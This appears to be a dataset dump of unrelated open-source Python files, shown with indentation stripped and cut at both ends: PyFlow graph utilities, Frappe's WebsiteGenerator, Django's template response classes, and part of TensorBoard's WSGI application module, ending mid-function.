dst.affected_by.remove(src)
src.pinDisconnected(dst)
dst.pinDisconnected(src)
push(dst)
if src.isExec() and dst.isExec():
src.onExecute.disconnect(dst.call)
return True
return False
def push(start_from):
"""Marks dirty all ports from start to the right
this part of graph will be recomputed every tick
:param start_from: pin from which recursion begins
:type start_from: :py:class:`~PyFlow.Core.PinBase.PinBase`
"""
if not len(start_from.affects) == 0:
start_from.setDirty()
for i in start_from.affects:
i.setDirty()
push(i)
def extractDigitsFromEndOfString(string):
"""Get digits at end of a string
Example:
>>> nums = extractDigitsFromEndOfString("h3ello154")
>>> print(nums, type(nums))
>>> 154 <class 'int'>
:param string: Input numbered string
:type string: str
:returns: Numbers in the final of the string
:rtype: int
"""
result = re.search('(\d+)$', string)
if result is not None:
return int(result.group(0))
def removeDigitsFromEndOfString(string):
"""Delete the numbers at the end of a string
Similar to :func:`~PyFlow.Core.Common.extractDigitsFromEndOfString`, but removes digits in the end.
:param string: Input string
:type string: string
:returns: Modified string
:rtype: string
"""
return re.sub(r'\d+$', '', string)
def getUniqNameFromList(existingNames, name):
"""Create unique name
Iterates over **existingNames** and extracts the end digits to find a new unique id
:param existingNames: List of strings where to search for existing indexes
:type existingNames: list
:param name: Name to obtain a unique version from
:type name: str
:returns: New name non overlapin with any in existingNames
:rtype: str
"""
if name not in existingNames:
return name
ids = set()
for existingName in existingNames:
digits = extractDigitsFromEndOfString(existingName)
if digits is not None:
ids.add(digits)
idx = findGoodId(ids)
nameNoDigits = removeDigitsFromEndOfString(name)
return nameNoDigits + str(idx)
def clearSignal(signal):
"""Disconnects all receivers
:param signal: emitter
:type signal: :class:`~blinker.base.Signal`
"""
for receiver in list(signal.receivers.values()):
if isinstance(receiver, weakref.ref):
signal.disconnect(receiver())
else:
signal.disconnect(receiver)
class SingletonDecorator:
"""Decorator to make class unique, so each time called same object returned
"""
allInstances = []
@staticmethod
def destroyAll():
for instance in SingletonDecorator.allInstances:
instance.destroy()
def __init__(self, cls):
self.cls = cls
self.instance = None
self.allInstances.append(self)
def destroy(self):
del self.instance
self.instance = None
def __call__(self, *args, **kwds):
if self.instance is None:
self.instance = self.cls(*args, **kwds)
return self.instance
class DictElement(tuple):
"""PyFlow dict element class
This subclass of python's :class:`tuple` is to represent dict elements to construct typed dicts
"""
def __new__(self, a=None, b=None):
if a is None and b is None:
new = ()
elif b is None:
if isinstance(a, tuple) and len(a) <= 2:
new = a
else:
raise Exception("non Valid Input")
else:
new = (a, b)
return super(DictElement, self).__new__(self, new)
class PFDict(dict):
"""This subclass of python's :class:`dict` implements a key typed dictionary.
Only defined data types can be used as keys, and only hashable ones as determined by
>>> isinstance(dataType, collections.Hashable)
To make a class Hashable some methods should be implemented:
Example:
::
class C:
def __init__(self, x):
self.x = x
def __repr__(self):
return "C({})".format(self.x)
def __hash__(self):
return hash(self.x)
def __eq__(self, other):
return (self.__class__ == other.__class__ and self.x == other.x)
"""
def __init__(self, keyType, valueType=None, inp={}):
"""
:param keyType: Key dataType
:param valueType: value dataType, defaults to None
:type valueType: optional
:param inp: Construct from another dict, defaults to {}
:type inp: dict, optional
"""
super(PFDict, self).__init__(inp)
self.keyType = keyType
self.valueType = valueType
def __setitem__(self, key, item):
"""Re implements Python Dict __setitem__ to only allow Typed Keys.
Will throw an Exception if non Valid KeyType
"""
if type(key) == self.getClassFromType(self.keyType):
super(PFDict, self).__setitem__(key, item)
else:
raise Exception(
"Valid key should be a {0}".format(self.getClassFromType(self.keyType)))
def getClassFromType(self, pinType):
"""
Gets the internal data structure for a defined pin type
:param pinType: pinType Name
:type pinType: class or None
"""
pin = findPinClassByType(pinType)
if pin:
pinClass = pin.internalDataStructure()
return pinClass
return None
class PinReconnectionPolicy(IntEnum):
"""How to behave if pin has connections and another connection about to be performed.
"""
DisconnectIfHasConnections = 0 #: Current connection will be broken
ForbidConnection = 1 #: New connection will be cancelled
class PinOptions(Flag):
"""Used to determine how Pin behaves.
Apply flags on pin instances.
.. seealso:: :meth:`~PyFlow.Core.PinBase.PinBase.enableOptions` :meth:`~PyFlow.Core.PinBase.PinBase.disableOptions`
"""
ArraySupported = auto() #: Pin can hold array data structure
DictSupported = auto() #: Pin can hold dict data structure
SupportsOnlyArrays = auto() #: Pin will only support other pins with array data structure
AllowMultipleConnections = auto() #: This enables pin to allow more that one input connection. See :func:`~PyFlow.Core.Common.connectPins`
ChangeTypeOnConnection = auto() #: Used by :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` to determine if it can change its data type on new connection.
RenamingEnabled = auto() #: Determines if pin can be renamed
Dynamic = auto() #: Specifies if pin was created dynamically (during program runtime)
AlwaysPushDirty = auto() #: Pin will always be seen as dirty (computation needed)
Storable = auto() #: Determines if pin data can be stored when pin serialized
AllowAny = auto() #: Special flag that allow a pin to be :class:`~PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin`, which means non typed without been marked as error. By default a :py:class:`PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin` need to be initialized with some data type, other defined pin. This flag overrides that. Used in lists and non typed nodes
DictElementSupported = auto() #: Dicts are constructed with :class:`DictElement` objects. So dict pins will only allow other dicts until this flag enabled. Used in :class:`~PyFlow.Packages.PyFlowBase.Nodes.makeDict` node
class StructureType(IntEnum):
"""Used to determine structure type for values.
"""
Single = 0 #: Single data structure
Array = 1 #: Python list structure, represented as arrays -> typed and lists -> non typed
Dict = 2 #: :py:class:`PFDict` structure, is basically a rey typed python dict
Multi = 3 #: This means it can became any of the previous ones on connection/user action
def findStructFromValue(value):
"""Finds :class:`~PyFlow.Core.Common.StructureType` from value
:param value: input value to find structure.
:returns: Structure Type for input value
:rtype: :class:`~PyFlow.Core.Common.StructureType`
"""
if isinstance(value, list):
return StructureType.Array
if isinstance(value, dict):
return StructureType.Dict
return StructureType.Single
class PinSelectionGroup(IntEnum):
"""Used in :meth:`~PyFlow.Core.NodeBase.NodeBase.getPinSG` for optimization purposes
"""
Inputs = 0 #: Input pins
Outputs = 1 #: Outputs pins
BothSides = 2 #: Both sides pins
class AccessLevel(IntEnum):
"""Can be used for code generation
"""
public = 0 #: public
private = 1 #: private
protected = 2 #: protected
class PinDirection(IntEnum):
"""Determines whether it is input pin or output
"""
Input = 0 #: Left side pins
Output = 1 #: Right side pins
class NodeTypes(IntEnum):
"""Determines whether it is callable node or pure
"""
Callable = 0 #: Callable node is a node with exec pins
Pure = 1 #: Normal nodes
class Direction(IntEnum):
""" Direction identifiers
"""
Left = 0 #: Left
Right = 1 #: Right
Up = 2 #: Up
Down = 3 #: Down
class PinSpecifires:
"""Pin specifires constants
:var SUPPORTED_DATA_TYPES: To specify supported data types list
:var CONSTRAINT: To specify type constraint key
:var STRUCT_CONSTRAINT: To specify struct constraint key
:var ENABLED_OPTIONS: To enable options
:var DISABLED_OPTIONS: To disable options
:var INPUT_WIDGET_VARIANT: To specify widget variant string
:var DESCRIPTION: To specify description for pin, which will be used as tooltip
:var VALUE_LIST: Specific for string pin. If specified, combo box will be created
:var VALUE_RANGE: Specific for ints and floats. If specified, slider will be created instead of value box
:var DRAGGER_STEPS: To specify custom value dragger steps
"""
SUPPORTED_DATA_TYPES = "supportedDataTypes"
CONSTRAINT = "constraint"
STRUCT_CONSTRAINT = "structConstraint"
ENABLED_OPTIONS = "enabledOptions"
DISABLED_OPTIONS = "disabledOptions"
INPUT_WIDGET_VARIANT = "inputWidgetVariant"
DESCRIPTION = "Description"
VALUE_LIST = "ValueList"
VALUE_RANGE = "ValueRange"
DRAGGER_STEPS = "DraggerSteps"
class NodeMeta:
"""Node meta constants
:var CATEGORY: To specify category for node. Will be considered by node box
:var KEYWORDS: To specify list of additional keywords, used in node box search field
:var CACHE_ENABLED: To specify if node is cached or not
"""
CATEGORY = "Category"
KEYWORDS = "Keywords"
CACHE_ENABLED = "CacheEnabled"
|
the-stack_0_1628 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.website.utils import cleanup_page_name
from frappe.website.render import clear_cache
from frappe.modules import get_module_name
class WebsiteGenerator(Document):
website = frappe._dict()
def __init__(self, *args, **kwargs):
self.route = None
super(WebsiteGenerator, self).__init__(*args, **kwargs)
def get_website_properties(self, key=None, default=None):
out = getattr(self, '_website', None) or getattr(self, 'website', None) or {}
if not isinstance(out, dict):
# website may be a property too, so ignore
out = {}
if key:
return out.get(key, default)
else:
return out
def autoname(self):
if not self.name and self.meta.autoname != "hash":
self.name = self.scrubbed_title()
def onload(self):
self.get("__onload").update({
"is_website_generator": True,
"published": self.is_website_published()
})
def validate(self):
self.set_route()
def set_route(self):
if self.is_website_published() and not self.route:
self.route = self.make_route()
if self.route:
self.route = self.route.strip('/.')[:139]
def make_route(self):
'''Returns the default route. If `route` is specified in DocType it will be
route/title'''
from_title = self.scrubbed_title()
if self.meta.route:
return self.meta.route + '/' + from_title
else:
return from_title
def scrubbed_title(self):
return self.scrub(self.get(self.get_title_field()))
def get_title_field(self):
'''return title field from website properties or meta.title_field'''
title_field = self.get_website_properties('page_title_field')
if not title_field:
if self.meta.title_field:
title_field = self.meta.title_field
elif self.meta.has_field('title'):
title_field = 'title'
else:
title_field = 'name'
return title_field
def clear_cache(self):
super(WebsiteGenerator, self).clear_cache()
clear_cache(self.route)
def scrub(self, text):
return cleanup_page_name(text).replace('_', '-')
def get_parents(self, context):
'''Return breadcrumbs'''
pass
def on_update(self):
self.send_indexing_request()
def on_trash(self):
self.clear_cache()
self.send_indexing_request('URL_DELETED')
def is_website_published(self):
"""Return true if published in website"""
if self.get_condition_field():
return self.get(self.get_condition_field()) and True or False
else:
return True
def get_condition_field(self):
condition_field = self.get_website_properties('condition_field')
if not condition_field:
if self.meta.is_published_field:
condition_field = self.meta.is_published_field
return condition_field
def get_page_info(self):
route = frappe._dict()
route.update({
"doc": self,
"page_or_generator": "Generator",
"ref_doctype":self.doctype,
"idx": self.idx,
"docname": self.name,
"controller": get_module_name(self.doctype, self.meta.module),
})
route.update(self.get_website_properties())
if not route.page_title:
route.page_title = self.get(self.get_title_field())
return route
def send_indexing_request(self, operation_type='URL_UPDATED'):
"""Send indexing request on update/trash operation."""
if frappe.db.get_single_value('Website Settings', 'enable_google_indexing') \
and self.is_website_published() and self.meta.allow_guest_to_view:
url = frappe.utils.get_url(self.route)
frappe.enqueue('frappe.website.doctype.website_settings.google_indexing.publish_site', \
url=url, operation_type=operation_type) |
the-stack_0_1632 | # from profilehooks import profile
from django.http import HttpResponse
from .loader import get_template, select_template
class ContentNotRenderedError(Exception):
pass
class SimpleTemplateResponse(HttpResponse):
rendering_attrs = ['template_name', 'context_data', '_post_render_callbacks']
def __init__(self, template, context=None, content_type=None, status=None,
charset=None, using=None):
# It would seem obvious to call these next two members 'template' and
# 'context', but those names are reserved as part of the test Client
# API. To avoid the name collision, we use different names.
self.template_name = template
self.context_data = context
self.using = using
self._post_render_callbacks = []
# _request stores the current request object in subclasses that know
# about requests, like TemplateResponse. It's defined in the base class
# to minimize code duplication.
# It's called self._request because self.request gets overwritten by
# django.test.client.Client. Unlike template_name and context_data,
# _request should not be considered part of the public API.
self._request = None
# content argument doesn't make sense here because it will be replaced
# with rendered template so we always pass empty string in order to
# prevent errors and provide shorter signature.
super().__init__('', content_type, status, charset=charset)
# _is_rendered tracks whether the template and context has been baked
# into a final response.
# Super __init__ doesn't know any better than to set self.content to
# the empty string we just gave it, which wrongly sets _is_rendered
# True, so we initialize it to False after the call to super __init__.
self._is_rendered = False
def __getstate__(self):
"""
Raise an exception if trying to pickle an unrendered response. Pickle
only rendered data, not the data used to construct the response.
"""
obj_dict = self.__dict__.copy()
if not self._is_rendered:
raise ContentNotRenderedError('The response content must be '
'rendered before it can be pickled.')
for attr in self.rendering_attrs:
if attr in obj_dict:
del obj_dict[attr]
return obj_dict
def resolve_template(self, template):
"""Accept a template object, path-to-template, or list of paths."""
if isinstance(template, (list, tuple)):
return select_template(template, using=self.using)
elif isinstance(template, str):
return get_template(template, using=self.using)
else:
return template
def resolve_context(self, context):
return context
@property
def rendered_content(self):
"""Return the freshly rendered content for the template and context
described by the TemplateResponse.
This *does not* set the final content of the response. To set the
response content, you must either call render(), or set the
content explicitly using the value of this property.
"""
template = self.resolve_template(self.template_name)
context = self.resolve_context(self.context_data)
return template.render(context, self._request)
def add_post_render_callback(self, callback):
"""Add a new post-rendering callback.
If the response has already been rendered,
invoke the callback immediately.
"""
if self._is_rendered:
callback(self)
else:
self._post_render_callbacks.append(callback)
# @profile(immediate=True, sort=['tottime'], dirs=True)
def render(self):
"""Render (thereby finalizing) the content of the response.
If the content has already been rendered, this is a no-op.
Return the baked response instance.
"""
retval = self
if not self._is_rendered:
self.content = self.rendered_content
for post_callback in self._post_render_callbacks:
newretval = post_callback(retval)
if newretval is not None:
retval = newretval
return retval
@property
def is_rendered(self):
return self._is_rendered
def __iter__(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be iterated over.'
)
return super().__iter__()
@property
def content(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be accessed.'
)
return super().content
@content.setter
def content(self, value):
"""Set the content for the response."""
HttpResponse.content.fset(self, value)
self._is_rendered = True
class TemplateResponse(SimpleTemplateResponse):
rendering_attrs = SimpleTemplateResponse.rendering_attrs + ['_request']
def __init__(self, request, template, context=None, content_type=None,
status=None, charset=None, using=None):
super().__init__(template, context, content_type, status, charset, using)
self._request = request
|
the-stack_0_1633 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import sqlite3
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import parse as urlparse # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend.event_processing import db_import_multiplexer
from tensorboard.backend.event_processing import data_provider as event_data_provider # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = '/data'
PLUGIN_PREFIX = '/plugin'
PLUGINS_LISTING_ROUTE = '/plugins_listing'
PLUGIN_ENTRY_ROUTE = '/plugin_entry.html'
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
logger = tb_logging.get_logger()
def tensor_size_guidance_from_flags(flags):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
if not flags or not flags.samples_per_plugin:
return tensor_size_guidance
for token in flags.samples_per_plugin.split(','):
k, v = token.strip().split('=')
tensor_size_guidance[k] = int(v)
return tensor_size_guidance
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
if flags.db_import:
# DB import mode.
db_uri = flags.db
# Create a temporary DB file if we weren't given one.
if not db_uri:
tmpdir = tempfile.mkdtemp(prefix='tbimport')
atexit.register(shutil.rmtree, tmpdir)
db_uri = 'sqlite:%s/tmp.sqlite' % tmpdir
db_connection_provider = create_sqlite_connection_provider(db_uri)
logger.info('Importing logdir into DB at %s', db_uri)
multiplexer = db_import_multiplexer.DbImportMultiplexer(
db_uri=db_uri,
db_connection_provider=db_connection_provider,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads)
elif flags.db:
# DB read-only mode, never load event logs.
reload_interval = -1
db_connection_provider = create_sqlite_connection_provider(flags.db)
multiplexer = _DbModeMultiplexer(flags.db, db_connection_provider)
else:
# Regular logdir loading mode.
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance_from_flags(flags),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags))
if flags.generic_data != 'false':
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugin loader instances.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
:type plugins: list[base_plugin.TBLoader]
"""
db_uri = None
db_connection_provider = None
if isinstance(
deprecated_multiplexer,
(db_import_multiplexer.DbImportMultiplexer, _DbModeMultiplexer)):
db_uri = deprecated_multiplexer.db_uri
db_connection_provider = deprecated_multiplexer.db_connection_provider
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
db_connection_provider=db_connection_provider,
db_uri=db_uri,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
window_title=flags.window_title)
tbplugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
plugin = loader.load(context)
if plugin is None:
continue
tbplugins.append(plugin)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(tbplugins, flags.path_prefix)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(self, plugins, path_prefix=''):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
flags: An argparse.Namespace containing TensorBoard CLI flags.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
if self._path_prefix.endswith('/'):
# Should have been fixed by `fix_flags`.
raise ValueError('Trailing slash in path prefix: %r' % self._path_prefix)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError('Plugin %s has invalid name %r' % (plugin,
plugin.plugin_name))
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
raise
logger.warn('Plugin %s failed. Exception: %s',
plugin.plugin_name, str(e))
continue
for route, app in plugin_apps.items():
if not route.startswith('/'):
raise ValueError('Plugin named %r handles invalid route %r: '
'route does not start with a slash' %
(plugin.plugin_name, route))
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
)
if path.endswith('/*'):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if '*' in path:
# note we re-add the removed * in the format string
raise ValueError('Plugin %r handles invalid route \'%s*\': Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
unordered_prefix_routes[path] = app
else:
if '*' in path:
raise ValueError('Plugin %r handles invalid route %r: Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True))
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get('name')
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
# Technically is not possible as plugin names are unique and is checked
# by the check on __init__.
reason = (
'Plugin invariant error: multiple plugins with name '
'{name} found: {list}'
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, 'Plugin is not module loadable', 'text/plain', code=400)
# non-self origin is blocked by CSP but this is a good invariant checking.
if urlparse.urlparse(module_path).netloc:
raise ValueError('Expected es_module_path to be non-absolute path')
module_json = json.dumps('.' + module_path)
script_content = 'import({}).then((m) => void m.render());'.format(
module_json)
digest = hashlib.sha256(script_content.encode('utf-8')).digest()
script_sha = base64.b64encode(digest).decode('ascii')
html = textwrap.dedent("""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
""").format(name=name, script_content=script_content)
return http_util.Respond(
request,
html,
'text/html',
csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
for plugin in self._plugins:
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
'Plugin listing: is_active() for %s took %0.3f seconds',
plugin.plugin_name, elapsed)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
'disable_reload': plugin_metadata.disable_reload,
'enabled': is_active,
# loading_mechanism set below
'remove_dom': plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata['tab_name'] = plugin_metadata.tab_name
else:
output_metadata['tab_name'] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
if element_name is not None and es_module_handler is not None:
logger.error(
'Plugin %r declared as both legacy and iframed; skipping',
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
'type': 'CUSTOM_ELEMENT',
'element_name': element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
'type': 'IFRAME',
'module_path': ''.join([
request.script_root, DATA_PREFIX, PLUGIN_PREFIX, '/',
plugin.plugin_name, es_module_handler,
]),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
'type': 'NONE',
}
output_metadata['loading_mechanism'] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, 'application/json')
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](environ, start_response)
logger.warn('path %s not found, sending 404', clean_path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)(
environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir_spec.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon. If the spec looks like
# [a-zA-z]:\foo then we assume its a Windows path and not a single letter
# group
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/' and not os.path.splitdrive(specification)[0]):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval,
reload_task):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError('load_interval is negative: %d' % load_interval)
def _reload():
while True:
